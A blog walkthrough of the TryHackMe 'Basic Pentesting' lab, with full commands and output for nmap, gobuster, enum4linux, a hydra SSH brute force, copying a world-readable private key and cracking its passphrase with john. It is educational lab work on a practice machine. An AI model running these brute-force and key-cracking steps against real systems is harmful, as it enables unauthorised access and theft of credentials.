Post

Basic Pentesting Room

Posted Updated
A man sitting at a computer in a dark outfit
A man sitting at a computer in a dark outfit
By Northmatrix
5 min read
Basic Pentesting Room

Overview

Basic pentesting is a Tryhackme room that is designed to introduce to the following: brute forcing, Hash cracking, Service Enumeration and Linux Enumeration.

Begin by Running an Nmap Scan

First we find what services are running on the machine using nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13

root@ip-10-10-175-193:~#  nmap -sT -T5 10.10.65.91
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-04 14:40 BST
Nmap scan report for ip-10-10-65-91.eu-west-1.compute.internal (10.10.65.91)
Host is up (0.0067s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8009/tcp open  ajp13
8080/tcp open  http-proxy
MAC Address: 02:FC:39:AB:D5:D1 (Unknown)

Gobuster

The flag is stated to be a hidden dir on the webserver 8080 appears to be a tomcat management page so we begin running a gobuster directory scan on port 80 http to find hidden directories.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

root@ip-10-10-175-193:~# gobuster dir -u 10.10.65.91 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.65.91
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 276]
/.htaccess            (Status: 403) [Size: 276]
/.htpasswd            (Status: 403) [Size: 276]
/development          (Status: 301) [Size: 316] [--> http://10.10.65.91/development/]
/index.html           (Status: 200) [Size: 158]
/server-status        (Status: 403) [Size: 276]
Progress: 4655 / 4656 (99.98%)
===============================================================
Finished
===============================================================

From this we can see that the hidden directory is development inside this directory there are 2 files, one states that the user J has a weak password. this may be useful later.

Enume4Linux SMB

Next we run an eumeration scan on the server to gather information from the SMB on port 445 this gives us a long output containing the name of users that have bene gatherd from the enumeration.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

root@ip-10-10-175-193:~# enum4linux -a 10.10.65.91
WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jul  4 14:46:28 2025

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.65.91
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

...
...
...
...

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
S-1-22-1-1002 Unix User\ubuntu (Local User)

Hydra

After finding out the username that J refers to and we know the fact that it has a weak password we can now being to ssh brute force using hydra.

1
2
3
4
5
6
7
8
9
10

root@ip-10-10-175-193:~# hydra -l jan  -P /usr/share/wordlists/rockyou.txt 10.10.65.91 -t 4 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-04 14:51:21
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.65.91:22/

[22][ssh] host: 10.10.65.91   login: jan   password: a*****o
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-07-04 14:51:38

Using the username and login we can now connect to the server using ssh.

Priv Esc Enumeration

After gaining access to the server i began attempting to find privilege escalation vulnerabilities. below are some of what i tired.

  • Searching for SUID bins
  • Checking sudo capabilities.
  • Looking for other user insecure permissions.
  • Alternatively i could have used Linpeas.sh to automate the process

After looking through other users files i found that kay had her private key with an insecure permission setting allowing anyone to read her private ssh key

i then used scp to download this to my host and will attempt to use it to gain access to this account. which is has more permissions than Jans account

1
2
3
4

$ id kay
uid=1000(kay) gid=1000(kay) groups=1000(kay),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
$ id jan
uid=1001(jan) gid=1001(jan) groups=1001(jan)

Cracking the Protected Key File

Ater downloading the rsa key we can see that it is password protected luckily we can use john the ripper to crack this key, however first we need to transform the file into a format john can understand to do this we can run the command followed by the cracking off the actual output file from said command.

1
2
3
4
5
6
7
8
9
10
11
12
13
14

root@ip-10-10-175-193:~# /opt/john/ssh2john.py id_rsa > john_id_rsa

root@ip-10-10-175-193:~# john john_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
b*****x          (id_rsa)

We can now login to kay account using the private key.

Getting the Final Password

After logging into kays account we can now simply list the directors and we can see a pass.bak file which we now have access to below is the output from said file.

1
2

$ cat pass.bak                                         
heresar******************************************olicy$$
tryhackme
smb rce
This post is licensed under CC BY 4.0 by the author.

Trending Tags

math rce rust security smb